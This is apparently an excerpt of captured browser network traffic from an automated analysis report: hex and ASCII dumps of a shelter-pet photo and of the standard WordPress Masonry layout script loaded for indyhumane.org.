                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1083INData Raw: 73 5b 61 5d 3b 76 6f 69 64 20 30 21 3d 3d 64 26 26 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 62 5d 3d 63 3f 63 28 64 29 3a 64 29 7d 3b 76 61 72 20 63 3d 62 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 63 72 65 61 74 65 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 63 72 65 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 74 68 69 73 2e 5f 72 65 6d 61 70 56 32 4f 70 74 69 6f 6e 73 28 29 2c 63 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 61 2e 65 6c 65 6d 65 6e 74 29 2e 61 64 64 43 6c 61 73 73 28 22 6d 61 73 6f 6e 72 79 22 29 7d 2c 30 29 7d 3b 76 61 72 20 64 3d 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6c 61 79 6f 75 74 3b 62 2e 70 72 6f
                                                                                                                                                                                                                                                        Data Ascii: s[a];void 0!==d&&(this.options[b]=c?c(d):d)};var c=b.prototype._create;b.prototype._create=function(){var a=this;this._remapV2Options(),c.apply(this,arguments),setTimeout(function(){jQuery(a.element).addClass("masonry")},0)};var d=b.prototype.layout;b.pro


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        35192.168.2.44977913.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC622OUTGET /photos/352/dd66daa9-9433-4f14-b223-5ee977a0676b.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 80941
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Jan 2025 02:47:10 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD2AD7C14F2FC4
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: 5cb90a8a-b01e-0001-5c3a-629743000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015911Z-156796c549btx6v5hC1EWRq6c800000016d0000000004hfc
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC15850INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 0b bc 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 12 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 0f 01 02 00 06 00 00 00 b6 00 00 00 10 01 02 00 0e 00 00 00 bc 00 00 00 1a 01 05 00 01 00 00 00 ca 00 00 00 1b 01 05 00 01 00 00 00 d2 00 00 00 31 01 02 00 07 00 00 00 da 00 00 00 32 01 02 00 14 00 00 00 e1 00 00 00 3c 01 02 00 0e 00 00 00 f5 00 00 00 1a 01 05 00 01 00 00 00 03 01 00 00 1b 01 05 00 01 00 00 00 0b 01 00 00 69 87 04 00 01 00 00 00 13 01 00 00 25 88 04 00 01 00 00 00 93 0a 00 00 00 00 00 00 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 31 35 20 50 72 6f 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 31 37 2e 36 2e 31 00
                                                                                                                                                                                                                                                        Data Ascii: JFIFHHExifII*(12<i%AppleiPhone 15 ProHH17.6.1
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC16384INData Raw: b6 37 0d b2 11 23 80 5c fa 0a be d0 3b b6 55 36 03 d0 9e f5 f9 fb fb 4a 5c ea 3a 0f 8c f4 af 13 d9 6b 32 db aa c1 24 50 db 3c 99 55 73 ca 38 1d 05 7d 47 fb 3c dd 6b fe 20 fd 9f 74 4d 77 c4 ba 93 6a 1a b5 f2 79 d2 b3 1e 10 1e 8a 3e 83 8a b8 52 4d ea 4c db 4a e7 a5 4d a2 5c dc ee c6 d4 03 b9 35 81 a9 f8 4e 69 2d 8c 4e c8 c8 46 39 15 ea 4b 65 3c 52 99 ed c8 92 11 c3 21 ad 6f 2e ca e2 dd 04 e8 50 8e c0 7f 5a d5 42 26 5c f2 3c bb 45 f8 63 e1 cd 3b c3 d1 4b 79 66 75 0b d9 d7 73 b3 f4 5c f6 1f 4a c7 bc f8 5d e1 c9 a7 63 0c 72 59 12 7e 60 8d c1 af 6b 68 d6 de 12 17 25 41 e3 be 05 66 4e 52 43 ca 6d 23 9e 95 ab 8a b5 86 a6 ef 7b 9c ec b2 c5 1d 84 70 34 42 24 44 09 1e 3b 28 18 15 e7 5e 24 b2 96 e6 16 95 79 b7 cf 2d 9e d5 e9 37 d0 ee 66 2b 86 1b 79 07 9c 0a e2 75 18
                                                                                                                                                                                                                                                        Data Ascii: 7#\;U6J\:k2$P<Us8}G<k tMwjy>RMLJM\5Ni-NF9Ke<R!o.PZB&\<Ec;Kyfus\J]crY~`kh%AfNRCm#{p4B$D;(^$y-7f+yu
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC16384INData Raw: d6 12 d8 fb c5 b9 0b ef f5 ad 4d 39 95 a7 84 10 26 46 e8 0f 40 7d e9 b2 4e 3e fb 44 90 d9 20 89 1b c9 9e 60 65 f9 b0 64 60 7a 7a 9e a7 f3 af 4d f0 86 8f 15 9e 9f 25 e5 da 29 07 97 00 73 bb b2 8c 74 f7 f6 02 ad 58 68 f6 f7 b7 ea 91 39 90 20 f9 d8 1c ac 79 e3 83 eb 5d 19 92 d2 12 b0 c2 81 62 84 90 9b b8 50 47 53 57 08 f5 64 b9 f4 2d c5 1b 4f 7a 27 75 66 65 1f bb 85 57 07 27 d6 ba 31 0a c9 a6 14 53 e5 86 19 da 87 81 5c d4 32 4e b6 a6 70 5b 32 0d a1 c8 c7 7e 70 3d ea 4d 7b 59 87 4a d1 40 b7 60 b8 4c b1 27 9c e2 b4 d0 9b 39 68 87 6a 9a a5 a5 95 98 b4 4d bb f1 f3 2e 79 af 21 d5 b5 6b 9b 9b b2 b0 c8 91 5a 83 86 38 fd 2b c1 fe 22 7c 5d d7 34 af 1d 5a e9 96 36 0c 20 92 13 71 7b 7a 41 2a 8b 9c 04 fa e3 27 f2 af 8f be 29 fe d2 7a ac d6 d7 1a 76 9f 72 da 6d 91 7c 24
                                                                                                                                                                                                                                                        Data Ascii: M9&F@}N>D `ed`zzM%)stXh9 y]bPGSWd-Oz'ufeW'1S\2Np[2~p=M{YJ@`L'9hjM.y!kZ8+"|]4Z6 q{zA*')zvrm|$
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC16384INData Raw: 3c 80 a3 6e ec 06 4d 33 c3 3f 10 6f a6 f1 34 9a 76 ab a6 9b 2d 5e da 1c 17 62 09 b8 03 aa b6 e3 cf 1e f5 e8 f7 96 6b aa e9 90 de 0f 31 e5 1c 1c c4 22 90 fb e3 b6 2b cc b5 4d 1e d6 db c5 03 54 bb d3 51 6d a0 88 86 f3 a5 22 35 3f de 66 e0 9f a0 aa 71 77 e6 41 17 a5 99 e8 76 77 ba 06 b1 60 b7 d0 dd 5b d8 6f 24 3c 20 8e 18 75 cd 5a f2 74 6f fa 0b c1 fa 57 97 e9 f7 76 12 e9 c2 4b 4d 62 d2 c6 26 62 4c 5f 67 24 67 d4 1c 1c 83 c7 35 7b cf 8b fe 86 4b 4f fc 06 3f fc 4d 6d 19 bb 18 c9 2b 9c 95 b7 89 6e 35 4f 81 c6 fa 1d 1d ae ff 00 d3 0d bd e6 99 71 1e 37 c6 5c af 07 b1 1d 7f 0a ef 67 85 74 ef 87 a1 96 db fb 3e 7d f8 82 1d dc a8 ec 2b 9f b7 8d ef 2e 34 f6 86 65 b5 47 41 73 24 6a 36 96 39 ee 3d c1 a5 bd b5 d4 6e f5 bb e6 ba 9c c9 0e e1 24 19 6c 00 47 6f d3 34 5a c6
                                                                                                                                                                                                                                                        Data Ascii: <nM3?o4v-^bk1"+MTQm"5?fqwAvw`[o$< uZtoWvKMb&bL_g$g5{KO?Mm+n5Oq7\gt>}+.4eGAs$j69=n$lGo4Z
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC15939INData Raw: 77 bb 9c 06 2d 8c 90 83 3c 0a 9e 4b 6e 70 ce a7 33 b2 3b 2d 3c 78 a3 fb 1e 03 e5 59 69 50 95 cc 16 92 59 8b 89 22 4e c1 df 3c b7 ae 2a e6 3c 4d ff 00 3f 76 1f f8 28 5a af a7 eb da 7a 68 f0 2d d6 a5 0b 4f b7 e6 f2 ae f6 28 f6 c0 56 fd 4e 6a ef fc 24 1a 3f fd 04 47 fe 07 b7 ff 00 1b ad a2 95 b7 30 77 be c7 cb 37 be 63 7c 43 bd 5d 32 05 9a 4b db 05 06 29 0e 62 9c 0e 07 07 a3 03 80 7e b5 87 e1 5d 0b 51 b3 d1 b5 0f 11 05 7b 7d 72 da 19 6d 34 d8 24 7d f6 f2 03 96 2a 3f ba 0e 70 57 b1 5c 8a dd bb 6b 43 0e 9d a8 41 70 37 cf 1a 5c 44 cc 71 f7 f1 c6 7b 1d c0 8a ba 21 8f c3 17 fa ec b6 da 8b c5 a5 6b 76 f2 5e 2d 8d c2 ee 16 d7 28 9b f7 46 7b 06 19 04 7a e2 b9 ec 8e ae 6e 88 e6 34 2d 40 f8 97 c1 fa be ab a3 c5 9b 99 24 8e 3d 42 ce 61 8b 8b 39 82 95 96 26 f6 ca e5 4f
                                                                                                                                                                                                                                                        Data Ascii: w-<Knp3;-<xYiPY"N<*<M?v(Zzh-O(VNj$?G0w7c|C]2K)b~]Q{}rm4$}*?pW\kCAp7\Dq{!kv^-(F{zn4-@$=Ba9&O


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        36192.168.2.449787192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC392OUTGET /wp-includes/js/masonry.min.js?ver=4.2.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:11 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 24138
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/masonry.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sat, 13 Jun 2020 18:53:27 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC749INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2a 21 0a 20 2a 20 4d 61 73 6f 6e 72 79 20 50 41 43 4b 41 47 45 44 20 76 34 2e 32 2e 32 0a 20 2a 20 43 61 73 63 61 64 69 6e 67 20 67 72 69 64 20 6c 61 79 6f 75 74 20 6c 69 62 72 61 72 79 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6d 61 73 6f 6e 72 79 2e 64 65 73 61 6e 64 72 6f 2e 63 6f 6d 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 20 62 79 20 44 61 76 69 64 20 44 65 53 61 6e 64 72 6f 0a 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 6a 71 75 65 72 79 2d 62 72 69 64 67 65 74 2f 6a 71 75 65 72 79 2d
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated *//*! * Masonry PACKAGED v4.2.2 * Cascading grid layout library * https://masonry.desandro.com * MIT License * by David DeSandro */!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 30 21 3d 3d 6f 3f 6f 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 75 28 74 2c 65 29 7b 74 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 76 61 72 20 6f 3d 61 2e 64 61 74 61 28 6e 2c 69 29 3b 6f 3f 28 6f 2e 6f 70 74 69 6f 6e 28 65 29 2c 6f 2e 5f 69 6e 69 74 28 29 29 3a 28 6f 3d 6e 65 77 20 72 28 6e 2c 65 29 2c 61 2e 64 61 74 61 28 6e 2c 69 2c 6f 29 29 7d 29 7d 61 3d 61 7c 7c 65 7c 7c 74 2e 6a 51 75 65 72 79 2c 61 26 26 28 72 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 70 74 69 6f 6e 7c 7c 28 72 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 70 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 61 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 74 29 26 26 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 3d 61 2e 65 78 74 65 6e 64 28 21 30 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 74
                                                                                                                                                                                                                                                        Data Ascii: 0!==o?o:t}function u(t,e){t.each(function(t,n){var o=a.data(n,i);o?(o.option(e),o._init()):(o=new r(n,e),a.data(n,i,o))})}a=a||e||t.jQuery,a&&(r.prototype.option||(r.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.options,t
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 6f 66 66 28 74 2c 72 29 2c 64 65 6c 65 74 65 20 6e 5b 72 5d 29 2c 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 65 29 7d 72 65 74 75 72 6e 20 74 68 69 73 7d 7d 2c 65 2e 61 6c 6c 4f 66 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 74 68 69 73 2e 5f 65 76 65 6e 74 73 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 5f 6f 6e 63 65 45 76 65 6e 74 73 7d 2c 74 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 67 65 74 2d 73 69 7a 65 2f 67 65 74 2d 73 69 7a 65 22 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72
                                                                                                                                                                                                                                                        Data Ascii: off(t,r),delete n[r]),r.apply(this,e)}return this}},e.allOff=function(){delete this._events,delete this._onceEvents},t}),function(t,e){"function"==typeof define&&define.amd?define("get-size/get-size",e):"object"==typeof module&&module.exports?module.expor
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 28 6d 29 3f 30 3a 6d 7d 76 61 72 20 70 3d 61 2e 70 61 64 64 69 6e 67 4c 65 66 74 2b 61 2e 70 61 64 64 69 6e 67 52 69 67 68 74 2c 67 3d 61 2e 70 61 64 64 69 6e 67 54 6f 70 2b 61 2e 70 61 64 64 69 6e 67 42 6f 74 74 6f 6d 2c 79 3d 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2b 61 2e 6d 61 72 67 69 6e 52 69 67 68 74 2c 76 3d 61 2e 6d 61 72 67 69 6e 54 6f 70 2b 61 2e 6d 61 72 67 69 6e 42 6f 74 74 6f 6d 2c 5f 3d 61 2e 62 6f 72 64 65 72 4c 65 66 74 57 69 64 74 68 2b 61 2e 62 6f 72 64 65 72 52 69 67 68 74 57 69 64 74 68 2c 7a 3d 61 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 2b 61 2e 62 6f 72 64 65 72 42 6f 74 74 6f 6d 57 69 64 74 68 2c 45 3d 64 26 26 73 2c 62 3d 74 28 72 2e 77 69 64 74 68 29 3b 62 21 3d 3d 21 31 26 26 28 61 2e 77 69 64 74 68 3d 62 2b 28 45 3f 30 3a 70
                                                                                                                                                                                                                                                        Data Ascii: (m)?0:m}var p=a.paddingLeft+a.paddingRight,g=a.paddingTop+a.paddingBottom,y=a.marginLeft+a.marginRight,v=a.marginTop+a.marginBottom,_=a.borderLeftWidth+a.borderRightWidth,z=a.borderTopWidth+a.borderBottomWidth,E=d&&s,b=t(r.width);b!==!1&&(a.width=b+(E?0:p
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 74 2c 72 65 71 75 69 72 65 28 22 64 65 73 61 6e 64 72 6f 2d 6d 61 74 63 68 65 73 2d 73 65 6c 65 63 74 6f 72 22 29 29 3a 74 2e 66 69 7a 7a 79 55 49 55 74 69 6c 73 3d 65 28 74 2c 74 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 29 7d 28 77 69 6e 64 6f 77 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 69 3d 7b 7d 3b 69 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 65 29 74 5b 69 5d 3d 65 5b 69 5d 3b 72 65 74 75 72 6e 20 74 7d 2c 69 2e 6d 6f 64 75 6c 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 28 74
                                                                                                                                                                                                                                                        Data Ascii: "object"==typeof module&&module.exports?module.exports=e(t,require("desandro-matches-selector")):t.fizzyUIUtils=e(t,t.matchesSelector)}(window,function(t,e){var i={};i.extend=function(t,e){for(var i in e)t[i]=e[i];return t},i.modulo=function(t,e){return(t
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 44 61 73 68 65 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 2f 28 2e 29 28 5b 41 2d 5a 5d 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 72 65 74 75 72 6e 20 65 2b 22 2d 22 2b 69 7d 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 3b 76 61 72 20 6f 3d 74 2e 63 6f 6e 73 6f 6c 65 3b 72 65 74 75 72 6e 20 69 2e 68 74 6d 6c 49 6e 69 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 2e 64 6f 63 52 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 69 2e 74 6f 44 61 73 68 65 64 28 6e 29 2c 73 3d 22 64 61 74 61 2d 22 2b 72 2c 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 22 2b 73 2b 22 5d 22 29 2c 68 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79
                                                                                                                                                                                                                                                        Data Ascii: Dashed=function(t){return t.replace(/(.)([A-Z])/g,function(t,e,i){return e+"-"+i}).toLowerCase()};var o=t.console;return i.htmlInit=function(e,n){i.docReady(function(){var r=i.toDashed(n),s="data-"+r,a=document.querySelectorAll("["+s+"]"),h=document.query
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 6e 44 75 72 61 74 69 6f 6e 3a 73 2b 22 44 75 72 61 74 69 6f 6e 22 2c 74 72 61 6e 73 69 74 69 6f 6e 50 72 6f 70 65 72 74 79 3a 73 2b 22 50 72 6f 70 65 72 74 79 22 2c 74 72 61 6e 73 69 74 69 6f 6e 44 65 6c 61 79 3a 73 2b 22 44 65 6c 61 79 22 7d 2c 64 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 3b 64 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6e 2c 64 2e 5f 63 72 65 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 74 72 61 6e 73 6e 3d 7b 69 6e 67 50 72 6f 70 65 72 74 69 65 73 3a 7b 7d 2c 63 6c 65 61 6e 3a 7b 7d 2c 6f 6e 45 6e 64 3a 7b 7d 7d 2c 74 68 69 73 2e 63 73 73 28 7b 70 6f 73 69 74 69 6f 6e 3a 22 61 62 73 6f 6c 75 74 65 22 7d 29 7d 2c 64 2e 68 61 6e 64 6c 65 45 76 65 6e
                                                                                                                                                                                                                                                        Data Ascii: nDuration:s+"Duration",transitionProperty:s+"Property",transitionDelay:s+"Delay"},d=n.prototype=Object.create(t.prototype);d.constructor=n,d._create=function(){this._transn={ingProperties:{},clean:{},onEnd:{}},this.css({position:"absolute"})},d.handleEven
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 6f 6e 28 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 61 79 6f 75 74 2e 6f 70 74 69 6f 6e 73 2e 70 65 72 63 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 21 65 3f 74 2f 74 68 69 73 2e 6c 61 79 6f 75 74 2e 73 69 7a 65 2e 77 69 64 74 68 2a 31 30 30 2b 22 25 22 3a 74 2b 22 70 78 22 7d 2c 64 2e 67 65 74 59 56 61 6c 75 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6c 61 79 6f 75 74 2e 5f 67 65 74 4f 70 74 69 6f 6e 28 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6c 61 79 6f 75 74 2e 6f 70 74 69 6f 6e 73 2e 70 65 72 63 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 65 3f 74 2f 74 68 69 73 2e 6c 61 79 6f 75 74 2e 73 69 7a 65 2e 68 65 69 67 68 74 2a 31 30 30 2b 22 25 22 3a 74 2b 22
                                                                                                                                                                                                                                                        Data Ascii: on("horizontal");return this.layout.options.percentPosition&&!e?t/this.layout.size.width*100+"%":t+"px"},d.getYValue=function(t){var e=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&e?t/this.layout.size.height*100+"%":t+"
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 6e 5b 69 5d 3d 21 30 29 3b 69 66 28 74 2e 66 72 6f 6d 29 7b 74 68 69 73 2e 63 73 73 28 74 2e 66 72 6f 6d 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 3b 6e 3d 6e 75 6c 6c 7d 74 68 69 73 2e 65 6e 61 62 6c 65 54 72 61 6e 73 69 74 69 6f 6e 28 74 2e 74 6f 29 2c 74 68 69 73 2e 63 73 73 28 74 2e 74 6f 29 2c 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 3d 21 30 7d 3b 76 61 72 20 6c 3d 22 6f 70 61 63 69 74 79 2c 22 2b 6f 28 61 29 3b 64 2e 65 6e 61 62 6c 65 54 72 61 6e 73 69 74 69 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 74 68 69 73 2e 69 73 54 72 61 6e 73 69 74 69 6f 6e 69 6e 67 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 6c 61 79 6f 75 74 2e 6f 70 74 69 6f 6e 73 2e 74 72 61 6e 73 69 74
                                                                                                                                                                                                                                                        Data Ascii: n[i]=!0);if(t.from){this.css(t.from);var n=this.element.offsetHeight;n=null}this.enableTransition(t.to),this.css(t.to),this.isTransitioning=!0};var l="opacity,"+o(a);d.enableTransition=function(){if(!this.isTransitioning){var t=this.layout.options.transit
                                                                                                                                                                                                                                                        2025-01-09 01:59:11 UTC1369INData Raw: 69 73 2e 65 6c 65 6d 65 6e 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 63 73 73 28 7b 64 69 73 70 6c 61 79 3a 22 22 7d 29 2c 74 68 69 73 2e 65 6d 69 74 45 76 65 6e 74 28 22 72 65 6d 6f 76 65 22 2c 5b 74 68 69 73 5d 29 7d 2c 64 2e 72 65 6d 6f 76 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 26 26 70 61 72 73 65 46 6c 6f 61 74 28 74 68 69 73 2e 6c 61 79 6f 75 74 2e 6f 70 74 69 6f 6e 73 2e 74 72 61 6e 73 69 74 69 6f 6e 44 75 72 61 74 69 6f 6e 29 3f 28 74 68 69 73 2e 6f 6e 63 65 28 22 74 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 6c 65 6d 28 29 7d 29 2c 76 6f 69 64 20 74 68 69 73 2e 68 69
                                                                                                                                                                                                                                                        Data Ascii: is.element.parentNode.removeChild(this.element),this.css({display:""}),this.emitEvent("remove",[this])},d.remove=function(){return s&&parseFloat(this.layout.options.transitionDuration)?(this.once("transitionEnd",function(){this.removeElem()}),void this.hi


